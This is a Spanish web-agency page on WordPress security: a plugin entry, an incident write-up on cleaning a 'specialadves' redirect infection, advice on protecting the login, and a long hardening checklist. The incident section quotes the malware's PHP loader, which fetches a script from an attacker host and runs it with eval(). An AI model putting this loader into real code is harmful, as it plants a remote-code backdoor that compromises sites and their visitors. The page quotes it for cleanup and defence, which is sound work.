Diccionario de WordPress

WordPress es la herramienta más usada del mundo para hacer páginas Web, no solo para blog o pymes, también la usan entidades como: La Casa Blanca de Estados Unidos (whitehouse.gov), Mercedes Benz, Renault, El New York Times (nytco.com),  BBC America, Spotify, el sitio oficial de Suecia (sweden.se), Harvard Gazette y wordpress.com (123M de visitas) entre otros. Por lo tanto no se puede dudar de su seguridad, escalabilidad o capacidad para adaptarse a diferentes escenarios.

El Diccionario de WordPress es un espacio de nuestra página Web donde recogemos temas de interés relacionados con este CMS de referencia mundial en el desarrollo Web. Se debe ver como un complemento a los manuales existentes.

Diccionario de WordPress. Logo azul de WordPress

Contenidos de Seguridad

-Todos- Seguridad (4)
BulletProof Security - Desinfección de specialadves - Proteger la administración - Seguridad en WordPress -

BulletProof Security

Plugin que aumenta la seguridad de una página de WordPress.

Desinfección de specialadves

Tras una incidencia en una página web desarrollada con WordPress por un virus llamado que provoca una redirección de la página a otro dominio se aplica un protocolo que resuelve el problema....

Antecedentes

La página web está infectada por una inyección de código que instala el fichero tm en la raíz y genera la redirección.El contenido de ese fichero es el siguiente: Incluye esta instrucción:
 
$v=file_get_contents("http://w2w.specialadves.com/steps/s0.txt");
$v=str_replace("<?php","",$v);eval($v);
Seguramente la infectaron a través de una plantilla o plugin no actualizado.

Protocolo de desinfección aplicado

  1. Borrado de archivos
    1. Determinar versión con el archivo wp-includes/version.php: $wp_version = '5.3.12';
    2. Borrar todo menos wp-content
    3. Borrado de archivos de wp-content .hph de 08/04/2022
    4. Borrado de algún ficheros .hph
    5. No se borran las carpetas de los temas
  2. Base de datos
    1. Subir base de datos y reparar
    2. Borrar registro 2022 de wp-post.
    3. Buscar en base de datos specialadves. No se detecta en ningún registro
  3. Reinstalar WordPress
    1. Se busca la versión original de WordPress
    2. Descargar y subir los archivos de WordPress mediante FTP
    3. Reparar y asegurar
  4. Actualizar WordPress:
    1. Borrar usuario admin con nombre poco habitual.
    2. Cambiar contraseña débil del usuario admin por una de seguridad.
    3. Actualizar WordPress
    4. Actualizar PHP de 5.6 (muy obsoleto) a 7.4 en hosting
    5. Actualizar todos los plugins
    6. Activar SSL que estaba incluido en el contrato.
    7. Instalar Really Simple SSL.
    8. Instalación del plugin iThemes Security. Activar y configurar
    9. Revisión general para comprobar las diferentes áreas de la página.
Mas información sobre este tema en sucuri.net

Fecha: 12-05-2022

Proteger la administración

Es recomendable proteger la administración de WordPress mediante el uso de plugins....
Hay robots o programa creado específicamente para intentar continuamente acceder a las páginas Web constantemente probando miles de combinaciones de contraseñas para acceder a la página con objetivos perjudiciales para el propietario de las mismas. Hay dos sugerencias recomendadas para proteger el acceso al área de administración de WordPress. Una es añadir un sistema de reCAPTCHA y otra cambiar la ruta de acceso al login de la página Web. Esto se puede hacer con plugins específicos o mediante una suite de seguridad que lo integra todo.


Seguridad en WordPress

Es recomendable aplicar una capa de seguridad extra a WordPress para aumentar los niveles de seguridad de las páginas Web. Generalmente se usan plugins específicos para este tema....

Estos son acciones que se deben tener en cuenta al aplicar la capa de seguridad:

  • Auditoria de Cabeceras: Comprueba las cabeceras de una página Web
  • Auditoría WP-Doctor: Pasar la auditoría de seguridad de WP-Doctor y obtener la información
  • Avisos de incidencias: El sistema de seguridad avisa por email al administrador en caso de incidencia.
  • Bloqueo de IP por lista HackRepair.com: Se bloquean automáticamente las IP que figuran en la lista.
  • Bloqueo de IP por reincidencia: Se bloquean automáticamente las IP de infractores reincidentes y se guardan en una lista negra. Hay parámetros para determinar el nivel de reincidencia.
  • Detección 404 automática: Bloquea IP de usuarios que generan muchos errores 404 en poco tiempo. Son robots rastreadores de URL para intentar acceder a la Web.
  • Modo reposo: No permtie acceder al escritorio de WordPress a determinadas horas.
  • Cambiar prefijo de tablas wp_: Dificulta ataques por ScriptsSQL. Obligatorio hacer una copia de seguridad previa. Confirmar que los plugins y el theme lo tienen en cuenta.
  • Copias de seguridad de bases de datos: Realizar una copia periódica de la base de datos semanalmente o diaramente. Opción de recibirla por email
  • Detección de cambios de archivo: Comprueba los cambios en los archivos de WordPress previniendo posibles inyecciones de código maligno.
  • Ocultar escritorio: Oculta los accesos habituales de Admin, wp-login, etc. Obligatorio en sitios de un solo adminitrador.
  • Activar protección contra fuerza bruta en red: Evita la mayoría de ataques que recibe un sitio
  • Cadenas de consulta sospechosas: Estas cadenas suelen ser signos de alguien que trata de obtener acceso al sitio Web. ATENCIÓN algunos plugins y temas también pueden ser bloqueados.
  • Cadenas URL largas: Limita el número de caracteres que se pueden enviar en la dirección URL, usado para tratar de inyectar información en su base de datos.
  • Desactivar PHP en los plugins: Desactiva la ejecución de PHP en el directorio de plugins. Esto bloquea las peticiones a los archivos de PHP dentro del directorio de plugins que pueden ser explotados directamente.
  • Desactivar PHP en temas: Desactiva la ejecución de PHP en el directorio de temas. Esto bloquea la peticiones a ficheros PHP dentro de los directorios del tema que pueden ser atacados directamente.
  • Desactivar PHP en uploads: Bloquea las peticiones a los archivos de PHP subidos maliciosamente al directorio de subidas.
  • Eliminar permisos de escritura de archivos: Evita a scripts y usuarios el poder escribir en los archivos wp-config.php y .htaccess.
  • Filtrar métodos de petición: Filtrar las visitas con los métodos de rastreo, eliminar de petición.
  • Navegación de directorios: Impide ver una lista de archivos en un directorio
  • Protección de archivos: Proteger archivos del sistema readme.html, readme.txt, wp-config.php, install.php, wp-includes, y. htaccess.
  • Red de protección contra ataques: Esta red contra atacantes encontrados en otros sitios que utilizan iThemes Security.
  • Requisitos de contraseñas: Obliga a los usuarios a usar contraseñas seguras.
  • WP Acceso restringido a la API REST: La mayoría de las peticiones requerirán un usuario conectado o con un privilegio exclusivo,
  • WP Bloquea las solicitudes XML-RPC: Bloquea las solicitudes XML-RPC que contienen múltiples intentos de inicio de sesión.
  • WP Desactiva el editor de archivos de plugins y temas: Los plugins y temas se deben editar manualmente mediante una herramienta distinta a WordPress.
  • WP Desactiva la página del autor sin publicaciones: Esto hace que sea más difícil para los robots determinar los nombres de usuario mediante la desactivación de colocar archivos para los usuarios que no publiquen en su sitio.
  • WP Desactivar función XML-RPC: La funcionalidad XML-RPC de WordPress permite a servicios externos acceder y modificar contenido en el sitio. Lo usa el plugin Jetpack, la aplicación móvil de WordPress y los pingbacks.
  • WP Desactivar mensajes de error de inicio de sesión: Evita que los mensajes de error se muestren a un usuario en un intento fallido de inicio de sesión.
  • WP Eliminar la cabecera RSD (Real Simple Discovery): Si la web no se integra con servicios externos XML-RPC como Flickr entonces la función "RSD" es bastante inútil.
  • WP Evitar que las miniaturas de adjuntos se traspasen a otros archivos.: Ayuda a mitigar un ataque en el que los usuarios con perfil de "autor" o superior podrían borrar cualquier archivo de tu instalación de WordPress, incluidos archivos sensibles como wp-config.php.
  • WP Forzar a los usuarios a elegir un alias único: Evita que los bots y los atacantes obtengan con facilidad los nombres de usuario de acceso a partir del código de páginas de autor. D
  • WP Protección contra el tabnapping: Alterar enlaces target="_blank" para protegerte del tabnapping. Proteger a los visitantes de ataques de phishing lanzados por un sitio enlazado
  • WP Quita la cabecera de Windows Live Writer: Esto no es necesario si no utilizas Windows Live Writer u otros clientes de blogs que se basen en este archivo.
  • WP Reducir comentarios spam: Reduce el spam en los comentarios por negar comentarios de los robots sin remitente o sin un agente de usuario identificado.
  • WP Archivos de Licencia: Renombrar archivos que informan de la versión de WordPress como los tipo License. Se conoce como Information Leak.
  • WP cabeceras HTTP de seguridad: Añadir cabeceras HTTP de seguridad en WordPress. 1. X-Content-Type-Options. El objetivo de establecer esta cabecera es evitar que se cargue un archivo JS ó CSS con un MIME-Type diferente al declarado. 2. X-Frame-Options. La cabecera X-Frame-Options sirve para prevenir que la página pueda ser abierta en un frame, o iframe. De esta forma se pueden prevenir ataques de clickjacking sobre tu web. 3. Content-Security-Policy. Content Security Policy (CSP) es un estándar de seguridad informático introducido para evitar cross-site scripting (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de contenido malicioso en el contexto de la página web.
  • Instalar un firewall: Un firewall o muro cortafuegos protege a la página Web de ataques externos.

Más datos sobre el uso de WordPress

Correspondientes a 2021.

  • Su cuota de mercado de CMS es del 64%, el segundo es Shopify con el 5,2%.
  • Es el número uno en soluciones de eCommerce con un 25% de cuota de mercado gracias al plugin WooCommerce.
  • 455 millones de sitios Web están hechos con WP.
  • 409 millones de personas ven 21,2 mil millones de páginas de WP cada mes.
  • 661 nuevos sitios de WordPress se activan todos los días.

Actualizado con Limpiar HTML.

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.plugin cookies

ACEPTAR
Aviso de cookies